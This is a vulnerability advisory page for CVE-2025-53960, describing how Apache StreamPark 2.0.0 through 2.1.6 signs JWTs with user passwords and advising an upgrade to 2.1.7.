CVE-2025-53960
Apache StreamPark: Uses the user’s password as the secret key
In short
Apache StreamPark uses user passwords as the secret key to sign authentication tokens (JWTs). If an attacker captures a token, they can guess the password offline, or if they already know the password, they can create fake tokens to impersonate any user.
Technical detail
The vulnerability exists in JWT generation where user passwords are directly used as HMAC signing keys instead of a dedicated secret. An attacker with a captured JWT can perform offline brute-force attacks against the password, or with a known password can forge arbitrary identity tokens, enabling complete account compromise. Affected versions: 2.0.0 through 2.1.6.
Summary generated and translated by AI from the official description.
When issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user's password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user's password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover.
This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.
Users are recommended to upgrade to version 2.1.7, which fixes the issue.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
Affected products
Apache Software Foundation · Apache StreamParkWant to know if your infrastructure is exposed to this?
Talk to TrueHacking →